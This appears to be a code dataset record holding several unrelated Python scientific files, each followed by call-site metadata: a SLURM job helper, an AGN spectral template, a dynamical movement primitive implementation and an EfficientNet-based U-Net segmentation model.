""" Module to run programs on ibex """ import numpy as np import logging from .executor import Executor import re from pathlib import Path class RunError(Exception): """ Class for exceptions """ pass class IbexRun(Executor): """ Class to create jobs to run in ibex. When the `run()` method is called, a shell script will be submitted to the cluster via the `sbatch` command. Methods to overwrite: - `__init__` set up your own inputs, and the output directory for the jobs and the ibex stdout - `prepare` create and save the script that will be submitted to sbatch. In this script you can run terminal commands directly, or other python scripts. """ def __init__(self, time_per_command:int, out_ibex:Path, ncommands:int=1, jobname:str='IbexRun', partition:str='batch', ntasks:int=1, cpus_per_task:int=1, mem_per_cpu:int=2, max_jobs:int=1990, **kw): """ Define variables for the ibex job Args: time_per_command (int): Time that each individual command takes to run. out_ibex (Path): Directory to save output from ibex stdout ncommands (int, optional): Number of total commands to be run, which will later will be distributed in a maximum of 2,000 jobs in a job array. Defaults to 1. jobname (str, optional): Name of the job to be submitted. It will show in the ibex queue. Defaults to 'IbexRun'. partition (str, optional): Partition to run the job in ibex. Defaults to 'batch'. ntasks (int, optional): Number of tasks for the ibex job array. In most cases you will leave it as is. Defaults to 1. cpus_per_task (int, optional): Number of CPUs to be used per task. Defaults to 1. mem_per_cpu (int, optional): GBs of memory per CPU to request. Defaults to 2. """ self.time_per_command = time_per_command self.jobname = jobname self.partition = partition self.out_ibex = out_ibex self.ntasks = ntasks self.cpus_per_task = cpus_per_task self.mem_per_cpu = mem_per_cpu self.ncommands=ncommands self.max_jobs = max_jobs self.commands_per_job = int(np.ceil( self.ncommands / self.max_jobs )) self.njobs = int(np.ceil( self.ncommands / self.commands_per_job )) self.time_per_job = self.time_str(self.commands_per_job, self.time_per_command) self.script_file = out_ibex / 'script.sh' self.args = f'sbatch {self.script_file}'.split() super().__init__(self.args, **kw) @staticmethod def time_str(commands_per_job:int, t_per_command:int) -> str: """ Get the time of the job in the format hh:mm:ss according to the number of commands to run Args: commands_per_job (int): Number of commands to run per job in the array t_per_command (int): Time in minutes to run each command Returns: str: Time to request for each job in the array in hh:mm:ss format """ total_minutes = commands_per_job * t_per_command hours = np.floor(total_minutes/60) minutes = np.ceil(total_minutes % 60) return f'{int(hours):02}:{int(minutes):02}:00' def prepare(self): """ Make the script to be run in sbatch. This method will be overwritten in your own class, to make the script specific to the command that you wish to run. """ if not self.out_ibex.exists(): self.out_ibex.mkdir(parents=True) self.script = ( # This part will stay the same: "#!/bin/bash\n" f"#SBATCH --job-name={self.jobname}\n" f"#SBATCH --partition={self.partition}\n" f"#SBATCH --output={self.out_ibex}/%J.out\n" f"#SBATCH --time={self.time_per_job}\n" f"#SBATCH --ntasks={self.ntasks}\n" f"#SBATCH --cpus-per-task={self.cpus_per_task}\n" f"#SBATCH --mem-per-cpu={self.mem_per_cpu}G\n" f"#SBATCH --array=0-{self.njobs-1}\n" "\n" # This part will be overwritten: "echo 'Hello world!'\n" # Example using the SLURM_ARRAY_TASK_ID variable # "seq_file='sequences_${SLURM_ARRAY_TASK_ID}.fasta'\n" # "python script.py ${seq_file}\n" ) logging.info(f'Script to be submitted:\n{self.script}') with open(self.script_file, 'w') as f: f.write(self.script) def finish(self) -> str: """ Returns the job id if the submission to sbatch was successful. """ return re.search(r'\d+', self.completed_process.stdout).group()
[ "logging.info", "numpy.floor", "re.search", "numpy.ceil" ]
[((3405, 3433), 'numpy.floor', 'np.floor', (['(total_minutes / 60)'], {}), '(total_minutes / 60)\n', (3413, 3433), True, 'import numpy as np\n'), ((3450, 3477), 'numpy.ceil', 'np.ceil', (['(total_minutes % 60)'], {}), '(total_minutes % 60)\n', (3457, 3477), True, 'import numpy as np\n'), ((4668, 4726), 'logging.info', 'logging.info', (['f"""Script to be submitted:\n{self.script}"""'], {}), '(f"""Script to be submitted:\n{self.script}""")\n', (4680, 4726), False, 'import logging\n'), ((2481, 2520), 'numpy.ceil', 'np.ceil', (['(self.ncommands / self.max_jobs)'], {}), '(self.ncommands / self.max_jobs)\n', (2488, 2520), True, 'import numpy as np\n'), ((2549, 2596), 'numpy.ceil', 'np.ceil', (['(self.ncommands / self.commands_per_job)'], {}), '(self.ncommands / self.commands_per_job)\n', (2556, 2596), True, 'import numpy as np\n'), ((4946, 4994), 're.search', 're.search', (['"""\\\\d+"""', 'self.completed_process.stdout'], {}), "('\\\\d+', self.completed_process.stdout)\n", (4955, 4994), False, 'import re\n')]
""" <NAME>., <NAME>., & <NAME>. 2004, MNRAS, 347, 144 """ import numpy as np # Parameters for the Sazonov & Ostriker AGN template _Alpha = 0.24 _Beta = 1.60 _Gamma = 1.06 _E_1 = 83e3 _K = 0.0041 _E_0 = (_Beta - _Alpha) * _E_1 _A = np.exp(2e3 / _E_1) * 2e3**_Alpha _B = ((_E_0**(_Beta - _Alpha)) \ * np.exp(-(_Beta - _Alpha))) / \ (1.0 + (_K * _E_0**(_Beta - _Gamma))) # Normalization constants to make the SOS04 spectrum continuous. _SX_Normalization = 1.0 _UV_Normalization = _SX_Normalization * ((_A * 2e3**-_Alpha) * \ np.exp(-2e3 / _E_1)) / ((1.2 * 2e3**-1.7) * np.exp(2000.0 / 2000.)) _IR_Normalization = _UV_Normalization * ((1.2 * 10**-1.7) \ * np.exp(10.0 / 2e3)) / (1.2 * 159 * 10**-0.6) _HX_Normalization = _SX_Normalization * (_A * _E_0**-_Alpha * \ np.exp(-_E_0 / _E_1)) / (_A * _B * (1.0 + _K * _E_0**(_Beta - _Gamma)) * \ _E_0**-_Beta) def Spectrum(E, t=0.0, **kwargs): """ Broadband quasar template spectrum. References ---------- <NAME>., <NAME>., & <NAME>. 2004, MNRAS, 347, 144. """ op = (E < 10) uv = (E >= 10) & (E < 2e3) xs = (E >= 2e3) & (E < _E_0) xh = (E >= _E_0) & (E < 4e5) if type(E) in [int, float]: if op: F = _IR_Normalization * 1.2 * 159 * E**-0.6 elif uv: F = _UV_Normalization * 1.2 * E**-1.7 * np.exp(E / 2000.0) elif xs: F = _SX_Normalization * _A * E**-_Alpha * np.exp(-E / _E_1) elif xh: F = _HX_Normalization * _A * _B * (1.0 + _K * \ E**(_Beta - _Gamma)) * E**-_Beta else: F = 0 else: F = np.zeros_like(E) F += op * _IR_Normalization * 1.2 * 159 * E**-0.6 F += uv * _UV_Normalization * 1.2 * E**-1.7 * np.exp(E / 2000.0) F += xs * _SX_Normalization * _A * E**-_Alpha * np.exp(-E / _E_1) F += xh * _HX_Normalization * _A * _B * (1.0 + _K * \ E**(_Beta - _Gamma)) * E**-_Beta return E * F
[ "numpy.zeros_like", "numpy.exp" ]
[((233, 254), 'numpy.exp', 'np.exp', (['(2000.0 / _E_1)'], {}), '(2000.0 / _E_1)\n', (239, 254), True, 'import numpy as np\n'), ((305, 330), 'numpy.exp', 'np.exp', (['(-(_Beta - _Alpha))'], {}), '(-(_Beta - _Alpha))\n', (311, 330), True, 'import numpy as np\n'), ((585, 608), 'numpy.exp', 'np.exp', (['(2000.0 / 2000.0)'], {}), '(2000.0 / 2000.0)\n', (591, 608), True, 'import numpy as np\n'), ((1674, 1690), 'numpy.zeros_like', 'np.zeros_like', (['E'], {}), '(E)\n', (1687, 1690), True, 'import numpy as np\n'), ((541, 563), 'numpy.exp', 'np.exp', (['(-2000.0 / _E_1)'], {}), '(-2000.0 / _E_1)\n', (547, 563), True, 'import numpy as np\n'), ((675, 696), 'numpy.exp', 'np.exp', (['(10.0 / 2000.0)'], {}), '(10.0 / 2000.0)\n', (681, 696), True, 'import numpy as np\n'), ((788, 808), 'numpy.exp', 'np.exp', (['(-_E_0 / _E_1)'], {}), '(-_E_0 / _E_1)\n', (794, 808), True, 'import numpy as np\n'), ((1803, 1821), 'numpy.exp', 'np.exp', (['(E / 2000.0)'], {}), '(E / 2000.0)\n', (1809, 1821), True, 'import numpy as np\n'), ((1878, 1895), 'numpy.exp', 'np.exp', (['(-E / _E_1)'], {}), '(-E / _E_1)\n', (1884, 1895), True, 'import numpy as np\n'), ((1364, 1382), 'numpy.exp', 'np.exp', (['(E / 2000.0)'], {}), '(E / 2000.0)\n', (1370, 1382), True, 'import numpy as np\n'), ((1454, 1471), 'numpy.exp', 'np.exp', (['(-E / _E_1)'], {}), '(-E / _E_1)\n', (1460, 1471), True, 'import numpy as np\n')]
import numpy as np from ._base import DMPBase, WeightParametersMixin from ._forcing_term import ForcingTerm from ._canonical_system import canonical_system_alpha from ._dmp import dmp_imitate, dmp_open_loop class DMPWithFinalVelocity(WeightParametersMixin, DMPBase): """Dynamical movement primitive (DMP) with final velocity. Implementation according to <NAME>, <NAME>, <NAME>, <NAME>: Learning to Select and Generalize Striking Movements in Robot Table Tennis (2013), International Journal of Robotics Research 32(3), pp. 263-279, https://www.ias.informatik.tu-darmstadt.de/uploads/Publications/Muelling_IJRR_2013.pdf Parameters ---------- n_dims : int State space dimensions. execution_time : float Execution time of the DMP. dt : float, optional (default: 0.01) Time difference between DMP steps. n_weights_per_dim : int, optional (default: 10) Number of weights of the function approximator per dimension. int_dt : float, optional (default: 0.001) Time difference for Euler integration. p_gain : float, optional (default: 0) Gain for proportional controller of DMP tracking error. The domain is [0, execution_time**2/dt]. Attributes ---------- dt_ : float Time difference between DMP steps. This value can be changed to adapt the frequency. """ def __init__(self, n_dims, execution_time, dt=0.01, n_weights_per_dim=10, int_dt=0.001, p_gain=0.0): super(DMPWithFinalVelocity, self).__init__(n_dims, n_dims) self.execution_time = execution_time self.dt_ = dt self.n_weights_per_dim = n_weights_per_dim self.int_dt = int_dt self.p_gain = p_gain alpha_z = canonical_system_alpha(0.01, self.execution_time, 0.0, self.int_dt) self.forcing_term = ForcingTerm(self.n_dims, self.n_weights_per_dim, self.execution_time, 0.0, 0.8, alpha_z) self.alpha_y = 25.0 self.beta_y = self.alpha_y / 4.0 def step(self, last_y, last_yd, coupling_term=None): """DMP step. Parameters ---------- last_y : array, shape (n_dims,) Last state. last_yd : array, shape (n_dims,) Last time derivative of state (e.g., velocity). coupling_term : object, optional (default: None) Coupling term that will be added to velocity. Returns ------- y : array, shape (n_dims,) Next state. yd : array, shape (n_dims,) Next time derivative of state (e.g., velocity). """ self.last_t = self.t self.t += self.dt_ if not self.initialized: self.current_y = np.copy(self.start_y) self.current_yd = np.copy(self.start_yd) self.initialized = True # https://github.com/studywolf/pydmps/blob/master/pydmps/cs.py tracking_error = self.current_y - last_y dmp_step_euler_with_constraints( self.last_t, self.t, self.current_y, self.current_yd, self.goal_y, self.goal_yd, self.goal_ydd, self.start_y, self.start_yd, self.start_ydd, self.execution_time, 0.0, self.alpha_y, self.beta_y, self.forcing_term, coupling_term=coupling_term, int_dt=self.int_dt, p_gain=self.p_gain, tracking_error=tracking_error) return np.copy(self.current_y), np.copy(self.current_yd) def open_loop(self, run_t=None, coupling_term=None): """Run DMP open loop. Parameters ---------- run_t : float, optional (default: execution_time) Run time of DMP. Can be shorter or longer than execution_time. coupling_term : object, optional (default: None) Coupling term that will be added to velocity. Returns ------- T : array, shape (n_steps,) Time for each step. Y : array, shape (n_steps, n_dims) State at each step. """ return dmp_open_loop( self.execution_time, 0.0, self.dt_, self.start_y, self.goal_y, self.alpha_y, self.beta_y, self.forcing_term, coupling_term, run_t, self.int_dt, dmp_step_euler_with_constraints, start_yd=self.start_yd, start_ydd=self.start_ydd, goal_yd=self.goal_yd, goal_ydd=self.goal_ydd) def imitate(self, T, Y, regularization_coefficient=0.0): """Imitate demonstration. Parameters ---------- T : array, shape (n_steps,) Time for each step. Y : array, shape (n_steps, n_dims) State at each step. regularization_coefficient : float, optional (default: 0) Regularization coefficient for regression. """ self.forcing_term.weights[:, :], start_y, start_yd, start_ydd, goal_y, goal_yd, goal_ydd = dmp_imitate( T, Y, n_weights_per_dim=self.n_weights_per_dim, regularization_coefficient=regularization_coefficient, alpha_y=self.alpha_y, beta_y=self.beta_y, overlap=self.forcing_term.overlap, alpha_z=self.forcing_term.alpha_z, allow_final_velocity=True, determine_forces=determine_forces) self.configure( start_y=start_y, start_yd=start_yd, start_ydd=start_ydd, goal_y=goal_y, goal_yd=goal_yd, goal_ydd=goal_ydd) def solve_constraints(t0, t1, y0, y0d, y0dd, y1, y1d, y1dd): t02 = t0 * t0 t03 = t02 * t0 t04 = t03 * t0 t05 = t04 * t0 t12 = t1 * t1 t13 = t12 * t1 t14 = t13 * t1 t15 = t14 * t1 M = np.array([[1, t0, t02, t03, t04, t05], [0, 1, 2 * t0, 3 * t02, 4 * t03, 5 * t04], [0, 0, 2, 6 * t0, 12 * t02, 20 * t03], [1, t1, t12, t13, t14, t15], [0, 1, 2 * t1, 3 * t12, 4 * t13, 5 * t14], [0, 0, 2, 6 * t1, 12 * t12, 20 * t13]]) Y = np.vstack((y0, y0d, y0dd, y1, y1d, y1dd)) # Solve M*b = y for b in each DOF at once B = np.linalg.solve(M, Y) return B def apply_constraints(t, goal_y, goal_t, coefficients): if t > goal_t + np.finfo(float).eps: # For t > goal_t the polynomial should always 'pull' to the goal # position, but velocity and acceleration should be zero. # This is done to avoid diverging from the goal if the DMP is executed # longer than expected. return goal_y, np.zeros_like(goal_y), np.zeros_like(goal_y) else: t2 = t * t t3 = t2 * t t4 = t3 * t t5 = t4 * t pos = np.array([1, t, t2, t3, t4, t5]) vel = np.array([0, 1, 2 * t, 3 * t2, 4 * t3, 5 * t4]) acc = np.array([0, 0, 2, 6 * t, 12 * t2, 20 * t3]) g = np.dot(pos, coefficients) gd = np.dot(vel, coefficients) gdd = np.dot(acc, coefficients) return g, gd, gdd def determine_forces(T, Y, alpha_y, beta_y, allow_final_velocity): """Determine forces that the forcing term should generate. Parameters ---------- T : array, shape (n_steps,) Time of each step. Y : array, shape (n_steps, n_dims) Position at each step. alpha_y : float Parameter of the transformation system. beta_y : float Parameter of the transformation system. allow_final_velocity : bool Whether a final velocity is allowed. This should always be True for this function. Returns ------- F : array, shape (n_steps, n_dims) Forces. start_y : array, shape (n_dims,) Start position. start_yd : array, shape (n_dims,) Start velocity. start_ydd : array, shape (n_dims,) Start acceleration. goal_y : array, shape (n_dims,) Final position. goal_yd : array, shape (n_dims,) Final velocity. goal_ydd : array, shape (n_dims,) Final acceleration. """ assert allow_final_velocity n_dims = Y.shape[1] DT = np.diff(T) Yd = np.empty_like(Y) Yd[0] = 0.0 for d in range(n_dims): Yd[1:, d] = np.diff(Y[:, d]) / DT Ydd = np.empty_like(Y) Ydd[0] = 0.0 for d in range(n_dims): Ydd[1:, d] = np.diff(Yd[:, d]) / DT coefficients = solve_constraints( T[0], T[-1], Y[0], Yd[0], Ydd[0], Y[-1], Yd[-1], Ydd[-1]) execution_time = T[-1] - T[0] F = np.empty((len(T), n_dims)) for i in range(len(T)): g, gd, gdd = apply_constraints(T[i], Y[-1], T[-1], coefficients) F[i, :] = execution_time ** 2 * Ydd[i] - alpha_y * ( beta_y * (g - Y[i]) + gd * execution_time - Yd[i] * execution_time) - execution_time ** 2 * gdd return F, Y[0], Yd[0], Ydd[0], Y[-1], Yd[-1], Ydd[-1] def dmp_step_euler_with_constraints( last_t, t, current_y, current_yd, goal_y, goal_yd, goal_ydd, start_y, start_yd, start_ydd, goal_t, start_t, alpha_y, beta_y, forcing_term, coupling_term=None, coupling_term_precomputed=None, int_dt=0.001, p_gain=0.0, tracking_error=0.0): """Integrate regular DMP for one step with Euler integration. Parameters ---------- last_t : float Time at last step. t : float Time at current step. current_y : array, shape (n_dims,) Current position. Will be modified. current_yd : array, shape (n_dims,) Current velocity. Will be modified. goal_y : array, shape (n_dims,) Goal position. goal_yd : array, shape (n_dims,) Goal velocity. goal_ydd : array, shape (n_dims,) Goal acceleration. start_y : array, shape (n_dims,) Start position. start_yd : array, shape (n_dims,) Start velocity. start_ydd : array, shape (n_dims,) Start acceleration. goal_t : float Time at the end. start_t : float Time at the start. alpha_y : float Constant in transformation system. beta_y : float Constant in transformation system. forcing_term : ForcingTerm Forcing term. coupling_term : CouplingTerm, optional (default: None) Coupling term. Must have a function coupling(y, yd) that returns additional velocity and acceleration. coupling_term_precomputed : tuple A precomputed coupling term, i.e., additional velocity and acceleration. int_dt : float, optional (default: 0.001) Time delta used internally for integration. p_gain : float, optional (default: 0) Proportional gain for tracking error. tracking_error : float, optional (default: 0) Tracking error from last step. """ if start_t >= goal_t: raise ValueError("Goal must be chronologically after start!") if t <= start_t: return np.copy(start_y), np.copy(start_yd), np.copy(start_ydd) execution_time = goal_t - start_t coefficients = solve_constraints( start_t, goal_t, start_y, start_yd, start_ydd, goal_y, goal_yd, goal_ydd) current_t = last_t while current_t < t: dt = int_dt if t - current_t < int_dt: dt = t - current_t current_t += dt if coupling_term is not None: cd, cdd = coupling_term.coupling(current_y, current_yd) else: cd, cdd = np.zeros_like(current_y), np.zeros_like(current_y) if coupling_term_precomputed is not None: cd += coupling_term_precomputed[0] cdd += coupling_term_precomputed[1] f = forcing_term(current_t).squeeze() g, gd, gdd = apply_constraints(current_t, goal_y, goal_t, coefficients) coupling_sum = cdd + p_gain * tracking_error / dt ydd = (alpha_y * (beta_y * (g - current_y) + execution_time * gd - execution_time * current_yd) + gdd * execution_time ** 2 + f + coupling_sum) / execution_time ** 2 current_yd += dt * ydd + cd / execution_time current_y += dt * current_yd
[ "numpy.zeros_like", "numpy.copy", "numpy.empty_like", "numpy.finfo", "numpy.diff", "numpy.array", "numpy.dot", "numpy.linalg.solve", "numpy.vstack" ]
[((5868, 6113), 'numpy.array', 'np.array', (['[[1, t0, t02, t03, t04, t05], [0, 1, 2 * t0, 3 * t02, 4 * t03, 5 * t04], [0,\n 0, 2, 6 * t0, 12 * t02, 20 * t03], [1, t1, t12, t13, t14, t15], [0, 1, \n 2 * t1, 3 * t12, 4 * t13, 5 * t14], [0, 0, 2, 6 * t1, 12 * t12, 20 * t13]]'], {}), '([[1, t0, t02, t03, t04, t05], [0, 1, 2 * t0, 3 * t02, 4 * t03, 5 *\n t04], [0, 0, 2, 6 * t0, 12 * t02, 20 * t03], [1, t1, t12, t13, t14, t15\n ], [0, 1, 2 * t1, 3 * t12, 4 * t13, 5 * t14], [0, 0, 2, 6 * t1, 12 *\n t12, 20 * t13]])\n', (5876, 6113), True, 'import numpy as np\n'), ((6199, 6240), 'numpy.vstack', 'np.vstack', (['(y0, y0d, y0dd, y1, y1d, y1dd)'], {}), '((y0, y0d, y0dd, y1, y1d, y1dd))\n', (6208, 6240), True, 'import numpy as np\n'), ((6296, 6317), 'numpy.linalg.solve', 'np.linalg.solve', (['M', 'Y'], {}), '(M, Y)\n', (6311, 6317), True, 'import numpy as np\n'), ((8248, 8258), 'numpy.diff', 'np.diff', (['T'], {}), '(T)\n', (8255, 8258), True, 'import numpy as np\n'), ((8269, 8285), 'numpy.empty_like', 'np.empty_like', (['Y'], {}), '(Y)\n', (8282, 8285), True, 'import numpy as np\n'), ((8383, 8399), 'numpy.empty_like', 'np.empty_like', (['Y'], {}), '(Y)\n', (8396, 8399), True, 'import numpy as np\n'), ((6851, 6883), 'numpy.array', 'np.array', (['[1, t, t2, t3, t4, t5]'], {}), '([1, t, t2, t3, t4, t5])\n', (6859, 6883), True, 'import numpy as np\n'), ((6898, 6945), 'numpy.array', 'np.array', (['[0, 1, 2 * t, 3 * t2, 4 * t3, 5 * t4]'], {}), '([0, 1, 2 * t, 3 * t2, 4 * t3, 5 * t4])\n', (6906, 6945), True, 'import numpy as np\n'), ((6960, 7004), 'numpy.array', 'np.array', (['[0, 0, 2, 6 * t, 12 * t2, 20 * t3]'], {}), '([0, 0, 2, 6 * t, 12 * t2, 20 * t3])\n', (6968, 7004), True, 'import numpy as np\n'), ((7018, 7043), 'numpy.dot', 'np.dot', (['pos', 'coefficients'], {}), '(pos, coefficients)\n', (7024, 7043), True, 'import numpy as np\n'), ((7057, 7082), 'numpy.dot', 'np.dot', (['vel', 'coefficients'], {}), '(vel, coefficients)\n', (7063, 7082), True, 'import numpy as np\n'), ((7097, 7122), 'numpy.dot', 'np.dot', (['acc', 'coefficients'], {}), '(acc, coefficients)\n', (7103, 7122), True, 'import numpy as np\n'), ((2844, 2865), 'numpy.copy', 'np.copy', (['self.start_y'], {}), '(self.start_y)\n', (2851, 2865), True, 'import numpy as np\n'), ((2896, 2918), 'numpy.copy', 'np.copy', (['self.start_yd'], {}), '(self.start_yd)\n', (2903, 2918), True, 'import numpy as np\n'), ((3578, 3601), 'numpy.copy', 'np.copy', (['self.current_y'], {}), '(self.current_y)\n', (3585, 3601), True, 'import numpy as np\n'), ((3603, 3627), 'numpy.copy', 'np.copy', (['self.current_yd'], {}), '(self.current_yd)\n', (3610, 3627), True, 'import numpy as np\n'), ((6703, 6724), 'numpy.zeros_like', 'np.zeros_like', (['goal_y'], {}), '(goal_y)\n', (6716, 6724), True, 'import numpy as np\n'), ((6726, 6747), 'numpy.zeros_like', 'np.zeros_like', (['goal_y'], {}), '(goal_y)\n', (6739, 6747), True, 'import numpy as np\n'), ((8350, 8366), 'numpy.diff', 'np.diff', (['Y[:, d]'], {}), '(Y[:, d])\n', (8357, 8366), True, 'import numpy as np\n'), ((8466, 8483), 'numpy.diff', 'np.diff', (['Yd[:, d]'], {}), '(Yd[:, d])\n', (8473, 8483), True, 'import numpy as np\n'), ((11050, 11066), 'numpy.copy', 'np.copy', (['start_y'], {}), '(start_y)\n', (11057, 11066), True, 'import numpy as np\n'), ((11068, 11085), 'numpy.copy', 'np.copy', (['start_yd'], {}), '(start_yd)\n', (11075, 11085), True, 'import numpy as np\n'), ((11087, 11105), 'numpy.copy', 'np.copy', (['start_ydd'], {}), '(start_ydd)\n', (11094, 11105), True, 'import numpy as np\n'), ((6409, 6424), 'numpy.finfo', 'np.finfo', (['float'], {}), '(float)\n', (6417, 6424), True, 'import numpy as np\n'), ((11576, 11600), 'numpy.zeros_like', 'np.zeros_like', (['current_y'], {}), '(current_y)\n', (11589, 11600), True, 'import numpy as np\n'), ((11602, 11626), 'numpy.zeros_like', 'np.zeros_like', (['current_y'], {}), '(current_y)\n', (11615, 11626), True, 'import numpy as np\n')]
## https://www.kaggle.com/meaninglesslives/nested-unet-with-efficientnet-encoder import tensorflow as tf from tensorflow import keras #from efficientnet import EfficientNetB4 from efficientnet.tfkeras import EfficientNetB4 import numpy as np def convolution_block(x, filters, size, strides=(1,1), padding='same', activation=True): x = keras.layers.Conv2D(filters, size, strides=strides, padding=padding)(x) x = keras.layers.BatchNormalization()(x) if activation == True: x = keras.layers.LeakyReLU(alpha=0.1)(x) return x def residual_block(blockInput, num_filters=16): x = keras.layers.LeakyReLU(alpha=0.1)(blockInput) x = keras.layers.BatchNormalization()(x) blockInput = keras.layers.BatchNormalization()(blockInput) x = convolution_block(x, num_filters, (3,3) ) x = convolution_block(x, num_filters, (3,3), activation=False) x = keras.layers.Add()([x, blockInput]) return x def UEfficientNetB4(input_shape=(256, 256, 3), dropout_rate=0.5,imagenet_weights='imagenet'): backbone = EfficientNetB4(weights=imagenet_weights,include_top=False,input_shape=input_shape) input = backbone.input start_neurons = 8 conv4 = backbone.layers[342].output conv4 = keras.layers.LeakyReLU(alpha=0.1)(conv4) pool4 = keras.layers.MaxPooling2D((2, 2))(conv4) pool4 = keras.layers.Dropout(dropout_rate)(pool4) # Middle convm = keras.layers.Conv2D(start_neurons * 32, (3, 3), activation=None, padding="same", name='conv_middle')(pool4) convm = residual_block(convm, start_neurons * 32) convm = residual_block(convm, start_neurons * 32) convm = keras.layers.LeakyReLU(alpha=0.1)(convm) deconv4 = keras.layers.Conv2DTranspose(start_neurons * 16, (3, 3), strides=(2, 2), padding="same")(convm) deconv4_up1 = keras.layers.Conv2DTranspose(start_neurons * 16, (3, 3), strides=(2, 2), padding="same")(deconv4) deconv4_up2 = keras.layers.Conv2DTranspose(start_neurons * 16, (3, 3), strides=(2, 2), padding="same")(deconv4_up1) deconv4_up3 = keras.layers.Conv2DTranspose(start_neurons * 16, (3, 3), strides=(2, 2), padding="same")(deconv4_up2) uconv4 = keras.layers.concatenate([deconv4, conv4]) uconv4 = keras.layers.Dropout(dropout_rate)(uconv4) uconv4 = keras.layers.Conv2D(start_neurons * 16, (3, 3), activation=None, padding="same")(uconv4) uconv4 = residual_block(uconv4, start_neurons * 16) # uconv4 = residual_block(uconv4,start_neurons * 16) uconv4 = keras.layers.LeakyReLU(alpha=0.1)(uconv4) # conv1_2 deconv3 = keras.layers.Conv2DTranspose(start_neurons * 8, (3, 3), strides=(2, 2), padding="same")(uconv4) deconv3_up1 = keras.layers.Conv2DTranspose(start_neurons * 8, (3, 3), strides=(2, 2), padding="same")(deconv3) deconv3_up2 = keras.layers.Conv2DTranspose(start_neurons * 8, (3, 3), strides=(2, 2), padding="same")(deconv3_up1) conv3 = backbone.layers[154].output uconv3 = keras.layers.concatenate([deconv3, deconv4_up1, conv3]) uconv3 = keras.layers.Dropout(dropout_rate)(uconv3) uconv3 = keras.layers.Conv2D(start_neurons * 8, (3, 3), activation=None, padding="same")(uconv3) uconv3 = residual_block(uconv3, start_neurons * 8) # uconv3 = residual_block(uconv3,start_neurons * 8) uconv3 = keras.layers.LeakyReLU(alpha=0.1)(uconv3) deconv2 = keras.layers.Conv2DTranspose(start_neurons * 4, (3, 3), strides=(2, 2), padding="same")(uconv3) deconv2_up1 = keras.layers.Conv2DTranspose(start_neurons * 4, (3, 3), strides=(2, 2), padding="same")(deconv2) conv2 = backbone.layers[89].output #92=>89 uconv2 = keras.layers.concatenate([deconv2, deconv3_up1, deconv4_up2, conv2]) uconv2 = keras.layers.Dropout(0.1)(uconv2) uconv2 = keras.layers.Conv2D(start_neurons * 4, (3, 3), activation=None, padding="same")(uconv2) uconv2 = residual_block(uconv2, start_neurons * 4) # uconv2 = residual_block(uconv2,start_neurons * 4) uconv2 = keras.layers.LeakyReLU(alpha=0.1)(uconv2) deconv1 = keras.layers.Conv2DTranspose(start_neurons * 2, (3, 3), strides=(2, 2), padding="same")(uconv2) conv1 = backbone.layers[30].output uconv1 = keras.layers.concatenate([deconv1, deconv2_up1, deconv3_up2, deconv4_up3, conv1]) uconv1 = keras.layers.Dropout(0.1)(uconv1) uconv1 = keras.layers.Conv2D(start_neurons * 2, (3, 3), activation=None, padding="same")(uconv1) uconv1 = residual_block(uconv1, start_neurons * 2) # uconv1 = residual_block(uconv1,start_neurons * 2) uconv1 = keras.layers.LeakyReLU(alpha=0.1)(uconv1) uconv0 = keras.layers.Conv2DTranspose(start_neurons * 1, (3, 3), strides=(2, 2), padding="same")(uconv1) uconv0 = keras.layers.Dropout(0.1)(uconv0) uconv0 = keras.layers.Conv2D(start_neurons * 1, (3, 3), activation=None, padding="same")(uconv0) uconv0 = residual_block(uconv0, start_neurons * 1) # uconv0 = residual_block(uconv0,start_neurons * 1) uconv0 = keras.layers.LeakyReLU(alpha=0.1)(uconv0) uconv0 = keras.layers.Dropout(dropout_rate / 2)(uconv0) d1=keras.layers.UpSampling2D(size=(2,2))(uconv0) d1 = keras.layers.Conv2D(1, (3, 3), padding="same", activation=None, use_bias=False)(d1) d11=keras.layers.Activation('sigmoid',name='d1')(d1) d2 = keras.layers.UpSampling2D(size=(4, 4))(uconv1) d2 = keras.layers.Conv2D(1, (3, 3), padding="same", activation=None, use_bias=False)(d2) d22 = keras.layers.Activation('sigmoid', name='d2')(d2) d3 = keras.layers.UpSampling2D(size=(8, 8))(uconv2) d3 = keras.layers.Conv2D(1, (3, 3), padding="same", activation=None, use_bias=False)(d3) d33 = keras.layers.Activation('sigmoid', name='d3')(d3) d4 = keras.layers.UpSampling2D(size=(16, 16))(uconv3) d4 = keras.layers.Conv2D(1, (3, 3), padding="same", activation=None, use_bias=False)(d4) d44 = keras.layers.Activation('sigmoid', name='d4')(d4) d5 = keras.layers.UpSampling2D(size=(32, 32))(uconv4) d5 = keras.layers.Conv2D(1, (3, 3), padding="same", activation=None, use_bias=False)(d5) d55 = keras.layers.Activation('sigmoid', name='d5')(d5) d = keras.layers.concatenate([d1, d2, d3, d4, d5,input]) d = keras.layers.Conv2D(1, kernel_size=3, activation=None, padding='same', use_bias=False)(d) d = keras.layers.Activation('sigmoid', name='d')(d) model = keras.models.Model(inputs=input,outputs=[d,d11,d22,d33,d44,d55]) #model.name = 'u-xception' ''' Total params: 10,501,068 Trainable params: 10,435,420 Non-trainable params: 65,648 ''' return model def get_iou_vector(A, B): # Numpy version batch_size = A.shape[0] metric = 0.0 for batch in range(batch_size): t, p = A[batch], B[batch] true = np.sum(t) pred = np.sum(p) # deal with empty mask first if true == 0: metric += (pred == 0) continue # non empty mask case. Union is never empty # hence it is safe to divide by its number of pixels intersection = np.sum(t * p) union = true + pred - intersection iou = intersection / union # iou metrric is a stepwise approximation of the real iou over 0.5 iou = np.floor(max(0, (iou - 0.45) * 20)) / 10 metric += iou # teake the average over all images in batch metric /= batch_size return metric ## def IOU(label, pred): # Tensorflow version return tf.py_function (get_iou_vector, [label, pred > 0.5], tf.float64) def dice_loss(y_true, y_pred): smooth = 1. y_true_f = keras.backend.flatten(y_true) y_pred_f = keras.backend.flatten(y_pred) intersection = y_true_f * y_pred_f score = (2. * keras.backend.sum(intersection) + smooth) / (keras.backend.sum(y_true_f) + keras.backend.sum(y_pred_f) + smooth) return 1. - score ## def bce_dice_loss(y_true, y_pred): return keras.losses.binary_crossentropy(y_true, y_pred) + dice_loss(y_true, y_pred) def bce_logdice_loss(y_true, y_pred): return keras.losses.binary_crossentropy(y_true, y_pred) - keras.backend.log(1. - dice_loss(y_true, y_pred)) #import tensorflow_addons as tfa #tfa.losses.GIoULoss
